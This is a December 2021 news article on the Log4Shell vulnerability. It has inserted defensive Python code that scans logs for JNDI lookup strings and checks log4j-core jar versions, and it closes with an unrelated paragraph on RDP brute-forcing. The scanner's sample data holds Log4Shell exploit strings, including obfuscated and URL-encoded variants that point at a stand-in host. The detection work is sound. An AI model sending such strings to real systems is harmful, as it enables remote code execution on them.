Log4j Attacks Spike, CISA Says Vulnerability Is ‘One of Most Serious’ to Date

December 14, 2021 | Brooke Crothers

Security researchers are seeing widespread scanning for the vulnerability as malicious actors quickly jump on the Apache Log4j attack bandwagon. In response, CISA is on high alert and says it will actively maintain a community-sourced GitHub repository of publicly available information and vendor-supplied advisories regarding the Log4j vulnerability, among other Log4j vulnerability guidance.

Log4j vulnerability explained

CISA said it is responding to active, widespread exploitation of a critical remote code execution (RCE) vulnerability in Apache’s Log4j software library, versions 2.0-beta9 to 2.14.1, known as “Log4Shell” and “Logjam.”

Log4j is “very broadly used” in a variety of consumer and enterprise services, websites, and applications, as well as operational technology products, to log security and performance information, CISA said. The vulnerability allows an unauthenticated remote actor to potentially take control of an affected system.

The vulnerability appears in the action the Java Naming and Directory Interface (JNDI) takes to resolve variables, according to CISA. “Affected versions of Log4j contain JNDI features—such as message lookup substitution—that ‘do not protect against adversary-controlled LDAP [Lightweight Directory Access Protocol] and other JNDI related endpoints,’” according to the CVE-2021-44228 listing.

“An adversary can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows the adversary to take full control over the system. The adversary can then steal information, launch ransomware, or conduct other malicious activity,” CISA said.

Log4j attacks spike quickly

Early reports show attacks spiking quickly. Check Point Research said it saw a “pandemic-like spread since the outbreak on Friday,” with attacks rising to over 40,000 by Saturday.

Twenty-four hours after the initial outbreak, Check Point recorded almost 200,000 attack attempts globally. As of Tuesday, Check Point recorded over 1,270,000 attempts, with over 46% of those attempts made by known malicious groups.

“We have so far seen an attempted exploit on almost 44% of corporate networks globally,” Check Point said.

CISA Director: one of the most serious ‘in my career’

CISA Director Jen Easterly said in a phone briefing Monday (via Cyberscoop) that the vulnerability “is one of the most serious I’ve seen in my entire career, if not the most serious.”

In response, CISA and its partners, through the Joint Cyber Defense Collaborative, are tracking and responding to active, widespread exploitation of the vulnerability.

CISA urges organizations to review its Apache Log4j Vulnerability Guidance webpage and upgrade to Log4j version 2.15.0, or apply the appropriate vendor recommended mitigations immediately. CISA will continue to update the webpage as additional information becomes available.

Microsoft describes exploitation risk

A common pattern of exploitation risk is a web application with code designed to process usernames, referrer, or user-agent strings in logs, according to Microsoft. “These strings are provided as external input (e.g., a web app built with Apache Struts). An attacker can send a malformed username or set user-agent with the crafted exploit string hoping that this external input will be processed at some point by the vulnerable Log4j 2 code and trigger code execution,” Microsoft said.
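The exposure Microsoft describes is that untrusted request fields end up in log messages where Log4j's lookup substitution acts on them. As an added example (not from the article, CISA or Microsoft), the Python below scans constructed access-log lines for the JNDI lookup string that a defender would hunt for, first URL-decoding and collapsing nested Log4j lookups so that trivially disguised variants are still flagged. The log lines, hostnames and addresses are constructed (203.0.113.0/24 and .invalid are reserved documentation values).

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not taken from the article); 203.0.113.0/24 is documentation space.
SAMPLE_LOGS = [
    '203.0.113.5 - - [13/Dec/2021:10:01:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 128 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.9 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 128 "-" "${${lower:j}ndi:rmi://example.invalid/b}"',
    '203.0.113.11 - - [13/Dec/2021:10:01:12 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# Log4j lookups nest, so "${jndi:" can be assembled from inner lookups. Collapse the
# case-changing and default-value forms (innermost first, repeated to a fixed point) before matching.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then strip nested lookup wrappers until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        collapsed = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_lookups(lines):
    """Return (1-based line number, JNDI scheme) for each line carrying a JNDI lookup string."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((lineno, match.group(1).lower()))
    return hits


if __name__ == "__main__":
    for lineno, scheme in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {lineno}: JNDI lookup via {scheme}")
```

A hit in an access log only shows that the string was sent; whether it was evaluated depends on the application logging that field through a vulnerable Log4j 2, so pair this with the version inventory CISA asks for.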

Urgent action needed

CISA said it urges all organizations to review the latest CISA activity alert and upgrade to Log4j version 2.15.0, or apply the appropriate vendor-recommended mitigations immediately.
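Acting on that guidance starts with knowing which log4j-core jars are deployed and at what version. As an added example (not from the article or CISA), this Python helper reads a jar's manifest version, checks it against the affected range the article quotes (2.0-beta9 to 2.14.1, fixed in 2.15.0), and reports whether the JndiLookup class is still present, since Apache's published fallback mitigation for systems that cannot be upgraded is to remove that class. The jar is constructed in memory, and the Implementation-Version manifest header is assumed to carry the Log4j version.

```python
import io
import re
import zipfile

# Affected range and fixed release as quoted in the article (CISA alert).
FIRST_AFFECTED, LAST_AFFECTED, FIXED = "2.0-beta9", "2.14.1", "2.15.0"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def version_key(version: str) -> tuple:
    """Sortable key: numeric parts, then release stage (beta < rc < final), then stage number."""
    base, _, pre = version.partition("-")
    nums = [int(p) for p in base.split(".")]
    nums += [0] * (3 - len(nums))
    m = re.fullmatch(r"(beta|rc)(\d*)", pre)
    stage = {"beta": 0, "rc": 1}.get(m.group(1) if m else "", 2)
    number = int(m.group(2) or 0) if m else 0
    return (*nums, stage, number)


def is_affected(version: str) -> bool:
    return version_key(FIRST_AFFECTED) <= version_key(version) <= version_key(LAST_AFFECTED)


def assess_jar(jar_bytes: bytes) -> dict:
    """Report manifest version, affected status and whether JndiLookup.class is present.
    Assumes the Implementation-Version manifest header carries the Log4j version."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.MULTILINE)
        version = m.group(1) if m else None
        jndi_present = JNDI_LOOKUP_CLASS in jar.namelist()
    affected = version is not None and is_affected(version)
    return {
        "version": version,
        "affected_version": affected,
        "jndi_lookup_present": jndi_present,
        # Unaffected, or affected with the class already removed (Apache's fallback mitigation): no action.
        "needs_action": affected and jndi_present,
    }


def make_fake_jar(version: str, include_jndi: bool) -> bytes:
    """Constructed stand-in for log4j-core-<version>.jar, used only to exercise assess_jar()."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, not real bytecode
    return buf.getvalue()
```

Run it over `Path(...).rglob("*.jar")` contents in a real deployment; jars nested inside WAR or EAR archives need the same check applied recursively.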

“To be clear, this vulnerability poses a severe risk. We will only minimize potential impacts through collaborative efforts between government and the private sector. We urge all organizations to join us in this essential effort and take action,” CISA said.

Brute-forcing RDP (Remote Desktop Protocol) is becoming one of the most common attacks. In the past these attacks were primarily used by sophisticated APT groups but in 2021 they became much more accessible and are now being utilized by a wide variety of threat actors, including those with limited resources and minimal technical skills. Even script kiddies can use this attack vector.

This trend started before the pandemic but has accelerated significantly with the broad adoption of remote work and we should expect this trend to accelerate in 2022 for a variety of reasons:

  • An RDP compromise provides any threat actor with an open backdoor for a wide range of exploits, including ransomware attacks
  • Misconfigured machines with open external RDP ports continue to be extremely common
  • Many machines continue to use weak credentials which are vulnerable to RDP attacks and do not include additional security controls
  • RDP access continues to be sold on the Dark Web as a commodity, dramatically increasing the pool of actors using these exploits
